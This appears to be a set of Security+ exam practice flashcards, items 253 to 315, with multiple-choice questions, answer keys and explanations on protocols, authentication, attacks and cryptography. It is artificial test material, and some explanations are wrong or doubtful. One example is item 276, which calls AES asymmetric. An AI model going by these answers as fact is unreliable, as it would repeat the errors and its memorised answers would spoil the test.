The minimum password age setting is used to force users to use a password for a minimum amount of time before they are allowed to change it. This prevents them from rapidly cycling through the password history to reuse an older password.
Incorrect Answers:
Password history simply records a previous number of passwords, so that they cannot be reused in the system.
The maximum password age is used to expire a password after a certain time period.
Password complexity enforces the use of longer password lengths and character spaces, increasing password strength.

253
Q

Which of the following secure protocols protects traffic during transmission and uses TCP port 443? (Choose two.)

TFTP
SSL
TLS
SCP
SSH

A

SSL, TLS

Correct Answers:
Both Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols are used to encrypt traffic sent over untrusted networks, such as the Internet. Both use TCP port 443.
Incorrect Answers:
SCP is part of the SSH protocol suite and is used to copy files securely from one host to another.
SSH is a protocol used to connect to and administer hosts remotely.
Both SCP and SSH use TCP port 22. TFTP uses UDP port 69 and is totally unsecure.

254
Q

Which of the following describe a false reject rate? (Choose two.)

The error caused from rejecting someone who is in fact an authorized user

The error caused when an unauthorized user is validated as authorized

Type II error

Type I error

A

The error caused from rejecting someone who is in fact an authorized user
Type I error

Correct Answer:
A false reject rate (FRR) is the error caused from rejecting an authorized user; it is also called a Type I error.
Incorrect Answer:
A false acceptance rate (FAR) is the error caused when an unauthorized user is validated as authorized, also referred to as a Type II error.

255
Q

Which of the following details the specific access levels that individuals or entities may have when interacting with objects?

Access control list
Access approval list
Metadata table
Rule-based access control

A

Access control list

Correct Answer:
An access control list (ACL) is a physical or logical list that details specific access levels individuals or entities may have when interacting with objects. An ACL is also used on network devices to determine how traffic from various users can enter and exit a network device and access internal hosts.
Incorrect Answers:
Access approval lists and metadata tables are distractors and are not valid terms.
Rule-based access control is an access control model based upon various access control rules that apply to users, objects, and actions.

256
Q

Which of the following technologies allows devices to communicate with each other at very close range through radio signals by using a special chip implanted in the device, and may be vulnerable to eavesdropping and man-in-the-middle attacks?

802.11 wireless
Infrared
Bluetooth
Near-field communication (NFC)

A

Near-field communication (NFC)

Correct Answer:
Near-field communication enables devices to send very low-power radio signals to each other by using a special chip implanted in the device. This technology requires that the devices be extremely close or even touching each other. This technology is used for a wide variety of applications, including payments through NFC-enabled smartphones.
Incorrect Answers:
Neither 802.11 wireless nor Bluetooth technologies are used in this manner.
Infrared does not use radio frequency technology; it enables communications between devices using a beam of light.

257
Q

You have received reports that a number of hosts in your company’s internal network are sluggish and unresponsive. After troubleshooting other items, you decide to use a sniffer to examine the network traffic coming into the host. You see that massive amounts of ICMP broadcasts are being sent on the network. The switch is having trouble processing all of this traffic, due to repeated ICMP replies, causing it to slow down. Which of the following is the most likely explanation for this?

Flood attack
Malware attack
Phishing attack
Man-in-the-middle attack

A

Flood attack

Correct Answer:
A flood is a type of network attack based upon confusing a switch with ICMP traffic.
Incorrect Answers:
Malware would not cause a large volume of ICMP segments to be sent to a host.
A man-in-the-middle attack attempts to break into an existing communications session, and is not a denial-of-service attack.
A phishing attack is a form of social engineering attack using e-mail.

258
Q

Which of the following is a protocol used to obtain the status of digital certificates in public keys?

DHE
ECC
OCSP
RSA

A

OCSP

Correct Answer:
The Online Certificate Status Protocol (OCSP) is used to obtain the revocation status of digital certificates. It is used as an alternative to certificate revocation lists and enables clients to request and receive the electronic status of digital certificates automatically and in real time.
Incorrect Answers:
Diffie-Hellman Exchange (DHE) is a key negotiation and agreement protocol used in public key cryptography.
RSA is the de facto standard used to generate public and private key pairs in a PKI.
Elliptic curve cryptography (ECC) is a public key cryptography protocol used on small mobile devices, due to its low power and computing requirements.

259
Q

Which of the following utilities are specifically used to diagnose DNS issues? (Select Two)

ping
Kali
dig
Nmap
nslookup

A

dig, nslookup

Correct Answers:
Both dig and nslookup are designed to query DNS servers.
Incorrect Answers:
One might argue that Nmap and ping might be used to diagnose DNS, but neither of them is specifically for DNS queries.
Kali is a Linux distro, not a utility.

260
Q

Which of the following forms of authentication pass credentials in clear text and is not recommended for use?

PAP
CHAP
EAP
MS-CHAP

A

PAP

Correct Answer:
The Password Authentication Protocol (PAP) is an older authentication method that passes usernames and passwords in clear text. For this reason, it is no longer used.
Incorrect Answers:
CHAP, the Challenge Handshake Authentication Protocol, uses password hashes and challenge methods to authenticate to the system. Passwords are not passed in clear text with this protocol.
MS-CHAP (Microsoft CHAP) is a Microsoft proprietary version of CHAP, native to Windows systems.
The Extensible Authentication Protocol (EAP) is a modern authentication framework that can use various authentication methods. It also does not pass username and password information in clear text.

261
Q

Wissa is updating a printer driver on a Windows system. She downloads the latest driver from the manufacturer’s Web site. When installing the driver, Windows warns that the driver is unsigned. To which of the following threats is Wissa exposing her system?

Man-in-the-middle
Refactoring
Version control
Shimming

A

Refactoring

Correct Answer:
A refactored driver will work correctly, but might also perform other, malicious actions.
Incorrect Answers:
Man-in-the-middle might be a result of the refactor, but is not the threat itself.
Version control refers to formally tracking different versions of the baseline configuration.
A shim is a library that responds to inputs that the original device driver isn’t designed to handle, and it would require a separate file.

262
Q

Which of the following secure e-mail protocols is carried over an SSL or TLS connection and uses TCP port 993?

IMAPS
POP3
SMTP
IMAP4

A

IMAPS

Correct Answer:
IMAPS (secure IMAP) is a secure version of the IMAP4 protocol used over SSL or TLS connections to provide for client e-mail security.
Incorrect Answers:
SMTP is a server-side e-mail protocol and is not used over SSL or TLS. SMTP uses TCP port 25.
POP3 is a non-secure client-side e-mail protocol that uses TCP port 110.
IMAP4 is a non-secure client-side e-mail protocol that uses TCP port 143.

263
Q

Which of the following methods of log management involves visiting each individual host to review its log files?

Decentralized
Centralized
Syslog
SIEM

A

Decentralized

Correct Answers:
Decentralized log management means that logs are managed and reviewed on a host-by-host basis, rather than as a centralized, consolidated group.
Incorrect Answers:
Centralized log management involves collecting logs from across the network into a system and reviewing them as a group.
Security Information Event Management (SIEM) is a centralized method of obtaining logs and other data from disparate devices across a network.
Syslog is a logging tool found in UNIX and Linux systems, which can be used either on a centralized or decentralized basis.

264
Q

Which of the following statements best describes a buffer overflow attack?

An attack that uses unexpected numerical results from a mathematical operation to overflow a buffer.

An attack on a database through vulnerabilities in the Web application, usually in user input fields.

An attack that involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

An attack that exceeds the memory allocated to an application for a particular function, causing it to crash.

A

An attack that exceeds the memory allocated to an application for a particular function, causing it to crash.

Correct Answer:
A buffer overflow attack is an attack that exceeds the memory allocated to an application for a particular function, causing it to crash.
Incorrect Answers:
While similar to a buffer overflow attack, an integer overflow attack uses unexpected numerical results from a mathematical operation to overflow a buffer.
An SQL injection attack is an attack on a database through vulnerabilities in the Web application, usually in user input fields.
An XML injection attack involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

265
Q

Which of the following is the process of marking a photo or other type of media with geographical location information using the GPS of a mobile device?

Geolocation
Geofencing
Remote management
Geotagging

A

Geotagging

Correct Answers:
Geotagging is the practice of marking media files, such as pictures and video, with relevant information such as geographic location (using the GPS features of the mobile device) and time. This information can be used by security professionals to track where and how a mobile device has been used.
Incorrect Answers:
Remote management is the overall process of remotely managing and monitoring mobile devices that are used to connect to the corporate infrastructure.
Geolocation is the use of a device’s GPS features to determine device location, to locate points of interest, and to gather other useful information. Although it can be used to geotag media, it is not the same as geotagging.
Geofencing is the use of geolocation features to ensure that a mobile device does not leave specific areas of corporate property.

266
Q

Which of the following can cause a successful attack on a system when a user enters malicious code or characters into a form field on a Web application?

Lack of adequate memory in a buffer
Lack of input validation
Lack of restrictive permissions on the Web form
Lack of properly formatted HTML

A

Lack of input validation

Correct Answer:
A lack of input validation in the Web form field may allow certain types of attacks to take place when a user enters malicious or incorrect characters in the form.
Incorrect Answers:
Permissions do not affect the quality or type of input in the field, only who can access and perform actions on the form.
Adequate memory in a buffer cannot perform input validation functions.
Properly formatted HTML cannot perform input validation on a form field.

267
Q

Which of the following methods of strengthening weak keys involves taking a weak initial key and feeding it to an algorithm that produces an enhanced key, which is much stronger?

Key exchange
Key stretching
Key repetition
Key streaming

A

Key stretching

Correct Answer:
Key stretching is a technique used to change weak keys into stronger ones by feeding them into an algorithm to produce enhanced keys.
Incorrect Answers:
Key streaming involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output.
Key repetition is not a valid answer or term.
Key exchange involves generating and exchanging an asymmetric key used for a particular communications session, or exchanging public keys in order to use them for public key cryptography.

268
Q

Which of the following is an application designed to create and initiate files on a host to provide a fully functional virtual machine?

Host operating system
Load balancer
Hypervisor
Guest operating system

A

Hypervisor

Correct Answer:
A hypervisor, also called a virtual machine monitor, is application software responsible for creating and managing virtual machines and their associated files on a host.
Incorrect Answers:
The host operating system does not create or manage virtual machines; it merely shares resources with them.
The guest operating system is the virtual machine itself and is managed by a hypervisor.
A load balancer is either software or a hardware appliance responsible for balancing user requests and network traffic among several different physical or virtualized hosts.

269
Q

Which type of assessment is used to determine weaknesses within a system?

Threat assessment
Vulnerability assessment
Penetration test
Risk assessment

A

Vulnerability assessment

Correct Answer:
A vulnerability assessment looks for weaknesses in systems.
Incorrect Answers:
A threat assessment looks at events that could exploit vulnerabilities.
A risk assessment is a combination of assessments and is designed to assess factors, including likelihood and impact, that affect an asset.
A penetration test actually attempts to exploit any found weaknesses (usually after a vulnerability assessment) to gain access to systems.

270
Q

Which of the following is a variant of a phishing attack, where a phishing e-mail is sent to a high-value target instead of on a mass scale to all employees?

Whaling
Pharming
Vishing
Spear phishing

A

Whaling

Correct Answer:
Whaling is a social engineering attack that targets people in high-value positions, such as senior executives. It is a form of a phishing attack.
Incorrect Answers:
Spear phishing involves targeting a particular type of user, regardless of rank in the organization, and basing the attack on more detailed, in-depth information in order to convince the target that the phishing e-mail is actually valid.
Vishing is a form of phishing attack that takes place over Voice-over-IP (VoIP) telephone systems.
Pharming is a form of DNS attack.

271
Q

Which of the following uses a management information base (MIB) to provide detailed device-specific information to a central management console?

ACL
SMTP
SNMP
Syslog

A

SNMP

Correct Answer:
The Simple Network Management Protocol (SNMP) uses a management information base, or MIB, specific to each device and from which device information can be obtained.
Incorrect Answers:
SMTP, the Simple Mail Transport Protocol, is responsible for sending e-mail.
Syslog is a log server found in UNIX and Linux systems.
An access control list (ACL) resides on network devices and filters traffic coming into and out of a device.

272
Q

Which of the following are two characteristics of strong passwords? (Choose two.)

Authentication methods
Encryption strength
Password length
Use of additional character space

A

Password length
Use of additional character space

Correct Answer:
Password length and the use of additional character space are two important characteristics of password strength and complexity.
Incorrect Answers:
Neither authentication methods nor encryption strength directly affects password strength.

273
Q

Which of the following enables a user to provide one set of credentials to the system and use those credentials throughout other interconnected systems?

Single sign-on
Multifactor authentication
Pass-through authentication
Single-factor authentication

A

Single sign-on

Correct Answer:
Single sign-on is a method of authentication that enables a user to provide one set of credentials and use them throughout an interconnected network. Both Kerberos and Sesame protocols allow single sign-on.
Incorrect Answers:
Multifactor authentication refers to the use of several different factors to authenticate to a system, such as something you know, something you are, and something you have. Multifactor authentication can be used in a single sign-on environment but is not necessarily required.
Single-factor authentication uses only one factor, such as something you know, to authenticate to a system. It can also be used in a single sign-on environment but is not required.
Pass-through authentication can appear to be similar to single sign-on, but it requires all individual systems simply to accept credentials passed from another system without a unified approach.

274
Q

Which of the following types of factors could be used to describe a fingerprint-based method of logging in and authenticating to a touchscreen device?

Something you know
Something you do
Something you have
Something you are

A

Something you are

Correct Answer:
This is an example of “something you are,” like any biometric factor, such as a fingerprint or retinal eye pattern.
Incorrect Answers:
An example of “something you know” would be a password or PIN.
“Something you have” would include a token or smart card.
“Something you do” would be considered swiping a pattern like a pattern unlock on a cell phone.

275
Q

Which two of the following are typical ways of separating network hosts for security purposes? (Choose two.)

Geographically
Physically
Logically
Functionally

A

Physically
Logically

Correct Answer:
Networks are typically separated for security purposes either physically, logically, or both.
Physical separation involves separating network hosts by connecting them to different devices.
Logical separation involves separating them through segmented IP subnetworks.
Incorrect Answers:
Separating network hosts either geographically or functionally does not contribute to security.

276
Q

Which of the following is the most common public-private key generation algorithm used in public key cryptography?

RSA
ECDH
SHA-2
AES

A

RSA

Correct Answer:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography.
Incorrect Answers:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to initially negotiate, agree upon, and establish a secure session between two parties.
AES is the Advanced Encryption Standard, and it is not used in public key cryptography; it is an asymmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

278
Q

A password is an example of which of the following authentication factors?

Something you do
Something you have
Something you are
Something you know

A

Something you know

Correct Answer:
A password is memorized; therefore, you know it.
Incorrect Answers:
Something you do would be an action unique to you, such as a written signature.
Something you have is an item on your person, such as an ID card.
Something you are is an aspect of your physical person that is unique to you, such as a fingerprint.

279
Q

Which of the following cannot identify patterns alone and requires other data and event sources to identify trends and patterns?

Trend analysis
Quantitative analysis
Qualitative analysis
Log analysis

A

Log analysis

Correct Answer:
A log analysis can’t identify patterns alone and requires other data and event sources to identify trends and patterns.
Incorrect Answers:
Trend analysis involves looking at data from various sources, including device logs, to identify patterns over a period of time.
Both qualitative and quantitative analyses are risk assessment techniques.

280
Q

Travis just got promoted to network administrator after the previous administrator left rather abruptly. There are three new hires that need onboarding with user accounts. When Travis looks at all the existing account names, he notices there is no common naming system. Where should he look to try to give the new hires user accounts with proper naming conventions?

The Sarbanes-Oxley regulation
The most pertinent FIPS documentation
Microsoft best practices
The company’s account policy

A

The company’s account policy

Correct Answer:
The company’s account policy.
Incorrect Answers:
Microsoft best practices as well as FIPS might give some good ideas, but there is no law (such as Sarbanes-Oxley) requiring a certain naming convention for user accounts.

281
Q

Your company allows a number of employees to telecommute, and others travel extensively. You have been tasked with finding a centralized solution that will allow access to shared data over the Internet. Which of the following is best?

Subnetting
NAT
Virtualization
Cloud services

A

Cloud services

Correct Answer:
Cloud services can enable users to perform their work via a browser, from anywhere they have Internet connectivity. This can be configured either to allow a local copy along with the cloud copy of the data, or the data can be edited directly within the cloud.
Incorrect Answers:
Virtualization allows multiple virtual machines to run on the same piece of hardware.
Subnetting and network address translation (NAT) are important security concepts, but they are not the correct answer here.

282
Q

Which of the following regulations would guide a healthcare organization to protect the confidentiality of stored patient data adequately?

PCI
RMF
Sarbanes-Oxley
HIPAA

A

HIPAA

Correct Answer:
HIPAA regulates the protection of patient data in the healthcare and health insurance industry.
Incorrect Answers:
RMF covers the risk management of U.S. Department of Defense systems; Sarbanes-Oxley and PCI are involved with financial data.

283
Q

Which of the following cryptography types do you use when you want to perform a one-time, single-key, encrypted transaction with another company?

Hashing
Asymmetric
Symmetric
Steganography

A

Symmetric

Correct Answer:
When using symmetric encryption, both the sender and receiver use the same key.
Incorrect Answers:
Steganography hides data within photos or another piece of data.
Hashing is used to verify data integrity.
Asymmetric cryptography uses a public and private key pair for encryption, so it does not use the same key for both parties.

284
Q

Which of the following power devices do you install to enable the constant availability of critical servers during a power outage?

Generator
Battery backup
UPS
Power conditioner

A

Generator

Correct Answer:
To provide continuous power, you will need a generator, often gas-powered, that can provide power continuously until electrical power is restored. Be sure that you have enough gas! For very critical systems, multiple generators (tested regularly) are a common control.
Incorrect Answers:
A power conditioner helps provide clean power that is less likely to harm systems; it has nothing to do with power outages.
UPSes and battery backups are incorrect because they provide backup power for only a short period of time and are often used to allow a graceful shutdown of less critical systems.

285
Q

Which of the following is a rogue wireless access point set up to be nearly identical to a legitimate access point?

SSID cloaking
MAC spoofing
Jamming
Evil twin

A

Evil twin

Correct Answer:
An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point.
Incorrect Answers:
SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network’s Service Set Identifier.
MAC spoofing is an attempt to impersonate another host by using its MAC address.
Jamming is an intentional interference with the signal of a wireless network. It is often part of a DoS attack.

286
Q

Which of the following is a port-based authentication method?

WPA2
WEP
WPA
802.1X

A

802.1X

Correct Answer:
802.1X is a port-based authentication method, not a wireless encryption protocol.
Incorrect Answers:
WPA2 is an advanced encryption protocol, which uses AES.
WEP is a legacy wireless encryption protocol, which has been determined to be very weak and easily broken. It uses the RC4 streaming protocol and weak initialization vectors (24-bit) to encrypt data on wireless networks.
WPA was an interim protocol used to correct some of WEP’s weaknesses. It uses the TKIP protocol.

287
Q

Which of the following resides on network devices and filters traffic coming into and out of the device?

Syslog
SNMP
ACL
SMTP

A

ACL

Correct Answer:
An access control list (ACL) resides on network devices and filters traffic coming into and out of the device.
Incorrect Answers:
SMTP, the Simple Mail Transport Protocol, is responsible for sending e-mail.
The Simple Network Management Protocol (SNMP) uses a Management Information Base, or MIB, specific to each device, from which device information can be obtained.
Syslog is a log server found in UNIX and Linux systems.

288
Q

Which of the following technologies enables communication between devices using a beam of light?

802.11 wireless
Bluetooth
Infrared
Near Field Communications (NFC)

A

Infrared

Correct Answer:
Infrared enables communications between devices using a beam of light.
Incorrect Answers:
Neither 802.11 wireless nor Bluetooth technologies perform in this manner.
Near Field Communication is a newer technology in which devices send very low power radio signals to each other by using a special chip implanted in the device.
It requires that the devices be extremely close or touching and is used for a variety of applications, including payments through NFC-enabled smartphones.

289
Q

Which type of network intrusion detection system uses defined rule sets to determine when attacks may be occurring?

Rule-based system
Anomaly-based system
Signature-based system
Filter-based system

A

Rule-based system

Correct Answer:
Rule-based systems use predefined rule sets.
Incorrect Answers:
An anomaly-based system detects unusual network traffic patterns based upon a baseline of normal network traffic.
Signature-based systems use predefined traffic signatures, typically downloaded from a vendor.
Filter-based systems, such as routers and firewalls, base detection on access control lists that specify traffic that is permitted and denied.

290
Q

What is the third step in the incident response life cycle?

Detection and analysis
Preparation
Post-incident activity
Containment, eradication, and recovery

A

Containment, eradication, and recovery

Correct Answer:
Containment, eradication, and recovery is the third step of the incident response lifecycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

291
Q

Which of the following are characteristics of hashing? (Choose all that apply.)

Hashes produce fixed-length digests for variable-length text.
Hashing can be used to protect data integrity.
Hashes are cryptographic representations of plaintext.
Hashes are decrypted using the same algorithm and key that encrypted them.

A

Hashes produce fixed-length digests for variable-length text.
Hashing can be used to protect data integrity.
Hashes are cryptographic representations of plaintext.

Correct Answers:
“Hashes are cryptographic representations of plaintext,” “hashes produce fixed-length digests for variable-length text,” and “hashing can be used to protect data integrity” are all characteristics of hashing.
Incorrect Answers:
“Hashes are decrypted using the same algorithm and key that encrypted them” is incorrect. Hashes are produced from one-way mathematical functions and cannot be decrypted.

292
Q

Which of the following is a logging facility found in UNIX and Linux systems?

Syslog
Decentralized
Centralized
SIEM

A

Syslog

Correct Answer:
Syslog is a logging facility found in UNIX and Linux systems, which can be used on either a centralized or decentralized basis.
Incorrect Answers:
Centralized log management involves collecting logs from across the network into one system and being able to review them as a group.
Security Information Event Management (SIEM) is a centralized method of obtaining logs and other data from disparate devices across the network.
Decentralized log management means that logs are managed and reviewed on a host-by-host basis, rather than as a centralized, consolidated group.

293
Q

Which of the following is an access control model based upon various access control rules that apply to users, objects, and actions?

Access control list
Access approval list
Metadata table
Rule-based access control

A

Rule-based access control

Correct Answer:
Rule-based access control is an access control model based upon various access control rules that apply to users, objects, and actions.
Incorrect Answers:
An access control list (ACL) is a physical or logical list that details specific access levels individuals have to access objects.
It is also used on network devices to determine which traffic from various users can enter and exit network devices and access internal hosts.
Access approval lists and metadata tables are distractors and are not valid terms.

294
Q

Which of the following fire suppression chemicals widely replaced halon in data center fire suppression systems?

FM-200
Water
Shalon
Carbon dioxide

A

FM-200

Correct Answer:
FM-200 generally replaced halon in data center fire suppression systems.
Incorrect Answers:
Water is still used to combat certain classes of fires, but it did not replace halon.
Shalon doesn’t exist.
Carbon dioxide is used to combat both liquid and electrical fires, but it did not replace halon.

295
Q

Which of the following 802.11 encryption protocols would you implement to provide the strongest encryption for communications across your wireless network?

HTTPS
WEP
WPA
WPA2

A

WPA2

Correct Answer:
WPA2 (Wi-Fi Protected Access version 2) currently provides the strongest available encryption for wireless networks.
Incorrect Answers:
WPA and WEP are weaker protocols.
HTTPS is a secure protocol for connecting on the Web, but not within your own network.

296
Q

Scott is an outside specialist hired to audit a small, but suddenly fast-growing company. While performing a user audit, Scott notices that one user, Bradley, a sales intern who has worked for this company intermittently for three years, has the following permissions on the network: member of the Sales group; member of the Printer Administrators group; a user name/password on the primary company Internet gateway; and member of Domain Admins for the company Active Directory. Shocked, Scott asks around the office how this intern has this level of access. It seems Bradley has substantial tech skills, and the IT department gave him access to printers, the gateway, and domain controllers so that he “could help with different problems” over the years. This is a classic example of which of the following?

Least privilege
Privilege creep
Authentication failure
False acceptance rate

A

Privilege creep

Correct Answer:
Privilege creep. Bradley keeps getting new privileges, yet nothing is turned off.
Incorrect Answers:
Authentication failure implies something has gone wrong. There has been no failure in authentication.
The principle of least privilege means that administrators never give a user account more rights and permissions than is needed for the user to do his or her job.
False acceptance rate is the rate at which a biometric system erroneously identifies and authenticates unauthorized users as valid users.

297
Q

Which of the following tools will help you track down a potential backdoor program allowing access into a host on your network?

Monitor traffic from that specific computer with a protocol analyzer.
Run a port scan on your firewall.
Run a performance baseline test on the system.
Check the antimalware logs.

A

Monitor traffic from that specific computer with a protocol analyzer.

Correct Answer:
A protocol analyzer can intercept, log, and allow analysis to be conducted on network traffic, including the source and destination of the traffic.
Incorrect Answers:
None of these options will help track down the information that might be transmitted by a backdoor tool.

298
Q

Which of the following is a software or a hardware appliance responsible for balancing user requests and network traffic among several different physical or virtualized hosts?

Load balancer
Guest operating system
Host operating system
Hypervisor

A

Load balancer

Correct Answer:
A load balancer is a piece of application software or a hardware appliance that is responsible for balancing user requests and network traffic among several different physical or virtualized hosts.
Incorrect Answers:
The host operating system does not create or manage virtual machines; it merely shares resources with them.
The hypervisor, also called a virtual machine monitor, is a piece of application software that is responsible for creating and managing virtual machines and their associated files on a host.
The guest operating system is the virtual machine itself and is managed by a hypervisor.

299
Q

Which of the following desired attributes would make an organization most likely to move to a cloud provider?

Control
Availability
Accountability
Responsibility

A

Availability

Correct Answer:
Availability is the most likely attribute gained through potential redundancy and continuity of operations planning that’s (hopefully) inherent within the cloud environment. Cloud computing usually increases availability of data for users, since it is typically built on highly available, redundant infrastructures.
Incorrect Answers:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Users lose a large measure of control by moving to the cloud.

300
Q

Which of the following solutions allow applications that users can download, install, and execute to be added to a safe list?

Whitelisting
Graylisting
Blacklisting
Filtering

A

Whitelisting

Correct Answers:
Applications that users are allowed to download, install, and execute are added to a whitelist by an administrator; whitelisting is the opposite of blacklisting.
Incorrect Answers:
Blacklisting involves an administrator adding undesirable or restricted software or applications to a list on content filtering devices, in group policy, or through some other type of mechanisms. This ensures that users are not allowed to download, install, or execute these particular applications.
There is no such term as graylisting. Filtering typically involves checking traffic on a network device, based upon specific characteristics.
The term normally does not apply to software or applications.

301
Q

Containerization is the process of virtualizing which of the following items?

Virtual machine
Interface
Hardware
Operating system

A

Operating system

Correct Answer:
Containerization is the process of virtualizing the operating system. Containers often use storage segmentation to separate sensitive and personal data.
Incorrect Answers:
Virtual machines are not virtualized.
Traditional virtualization, not containerization, virtualizes hardware; and while it can be argued that both traditional virtualizations as well as containerization virtualize a system’s interface, that is not the best answer of the choices given.

302
Q

During which type of assessment would penetration testers not have any knowledge about the network, while defenders are aware of their presence? (Choose two.)

Black box test
Double-blind test
Gray box test
Unlimited test
Blind test

A

Black box test
Blind test

Correct Answers:
In a black box test, the testers have no knowledge of details about the network configuration, but system defenders are aware of their presence. This type of test is also referred to as a blind test.
Incorrect Answers:
In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders also have no knowledge of the test and aren’t aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders’ abilities to detect and respond to attacks as much as it is to test and exploit vulnerabilities on the network.
In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.
Unlimited test is not a real test in the Security+ arena.

303
Q

Which of the following policy settings enforces the use of longer password lengths and character spaces to increase password strength?

Maximum password age
Password complexity
Minimum password age
Password history

A

Password complexity

Correct Answer:
Password complexity enforces the use of longer password lengths and character spaces to increase password strength.
Incorrect Answers:
Password history records previous passwords so they cannot be reused in the system.
The maximum password age is used to expire a password after a certain time period.
The minimum password age setting is used to force users to use a password for a minimum amount of time before they are allowed to change it. This prevents them from rapidly cycling through the password history in order to reuse an older password.

304
Q

Before information is converted to an unreadable state using cryptography, in what form is the information?

Plaintext
Ciphertext
Hash
Message digest

A

Plaintext

Correct Answer:
Plaintext is unencrypted text.
Incorrect Answers:
Ciphertext is a result of the encryption process and is encrypted text.
A hash, or message digest, is a cryptographic representation of variable length text, but it is not the text itself.

305
Q

Which of the following answers best describes the one major advantage of TACACS+ over RADIUS?

TACACS+ is completely encrypted.
Kerberos is a proprietary standard, making it less safe.
TACACS+ uses RC4 encryption.
TACACS+ is an open standard, making it more safe.

A

TACACS+ is completely encrypted.

Correct Answer:
TACACS+ encrypts everything between all connection points.
Incorrect Answers:
Kerberos is an open standard, as is TACACS+. Open standards are considered safer than proprietary ones.
TACACS+ doesn’t define what encryption to use, but RC4 is dated and insecure.

306
Q

Which of the following terms represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of a component produced by that manufacturer?

Mean time between failures
Mean time to recovery
Mean time to failure
Mean time to replace

A

Mean time between failures

Correct Answer:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This is assuming that more than one failure will occur, which means that the component will be repaired, rather than replaced.
Incorrect Answers:
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from a failure.
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Mean time to replace is not a valid term.

307
Q

Which of the following can be established in a cloud environment through effective security controls and well-written service-level agreements? (Choose two.)

Responsibility
Accountability
Availability
Control

A

Responsibility
Accountability

Correct Answer:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Incorrect Answers:
Lack of control over data and the infrastructure is probably the greatest risk to cloud computing and cannot be completely managed through agreements.
Cloud computing usually increases the availability of data for users, since it is typically built on highly available, redundant infrastructures.

308
Q

Which of the following algorithms was one of the five finalists in the U.S. government-sponsored competition to become the Advanced Encryption Standard (AES), but did not win?

Rijndael
Twofish
RC4
Blowfish

A

Twofish

Correct Answer:
Twofish, a symmetric algorithm, was one of the five finalists for the competition, but it did not win.
Incorrect Answers:
Rijndael was selected as the winner of the NIST competition and became the U.S. government’s Advanced Encryption Standard (AES).
Blowfish is also a symmetric algorithm, but it was not considered in the competition to be the AES.
RC4 is a symmetric streaming cipher commonly seen in WEP and SSL implementations. It was not one of the finalists involved in the AES competition.

309
Q

Which of the following is the most comprehensive and expensive form of disaster recovery exercise?

Documentation review
Walkthrough test
Tabletop exercise
Full-scale test

A

Full-scale test

Correct Answer:
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.
Incorrect Answers:
A tabletop exercise is a type of group review.
The documentation review is the simplest form of test, in which the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an actual incident or disaster.

310
Q

Type the command to create an ACL entry that you would use to create an access rule on your router to prevent any telnet traffic from passing through to the destination network 192.168.21.0.

permit source all destination 192.168.21.0 tcp port 21
deny source 0.0.0.0 destination 192.168.21.0 udp port 123
deny source all destination 192.168.21.0 tcp port 23
permit source 192.168.13.0 destination 192.168.21.0 tcp port 80

A

deny source all destination 192.168.21.0 tcp port 23

Correct Answer:
The ACL should deny all traffic using TCP port 23. Ports 80, 21, and 123 are not related to telnet.
Incorrect Answers:
You should also note that we want to “deny source all,” not permit traffic or deny source 0.0.0.0.

311
Q

Which of the following methods of enhancing security between hosts involves generating and exchanging asymmetric keys within a particular communication session?

Key streaming
Key exchange
Key stretching
Key repetition

A

Key exchange

Correct Answer:
Key exchange involves generating and exchanging asymmetric keys used for a particular communication session, exchanging public keys in order to use them for public key cryptography.
Incorrect Answers:
Key stretching is a technique used to change weak keys to stronger ones by feeding them into an algorithm to produce an enhanced key.
Key streaming involves sending individual characters of the key through an algorithm and using a mathematical XOR function to change the output.
Key repetition is not a valid answer or term.

312
Q

For which of the following should employees receive training to establish how to handle end-of-life and unnecessary data?

Protection of personally identifiable information on social media
Data disposal
Information classification
Clean desk policies

A

Data disposal

Correct Answer:
Data disposal guidelines explain how different classifications of data should be properly disposed of to ensure that data is not later pieced together or recovered and exploited.
Incorrect Answers:
Clean desk policies often dictate how sensitive information should be stored after hours and while uncleared visitors are near the area.
Protection of personally identifiable information on social media would be part of an organization’s social media policy.
An organization’s information classification policy not only outlines what level of security protections certain data receives, but it also serves to instruct employees on how to treat sensitive data.

313
Q

Disabling ________ will help prevent security issues caused by having ping and traceroute enabled.

ICMP
DNS
SNMP
NTP

A

ICMP

Correct Answers:
ICMP is the protocol used by the ping and traceroute utilities for network diagnostics, and it should be disabled unless it’s being used for important purposes.
Incorrect Answers:
NTP is used by time services, DNS is used for IP/host name resolution, and SNMP enables network monitoring.

314
Q

Which of the following terms describes someone who hacks into systems, with permission of the system’s owner, to discover exploitable vulnerabilities and help secure the system?

Black hat hacker
White hat hacker
Black box tester
Gray hat hacker

A

White hat hacker

Correct Answers:
White hat hackers use their skills to assist in securing systems. They are usually penetration testing professionals or ethical hackers.
Incorrect Answers:
A gray hat hacker uses his or her skills for both good and evil purposes.
A black box tester tests a system without any prior knowledge of the network or infrastructure.
A black hat hacker uses his or her skills for malicious purposes.

315
Q

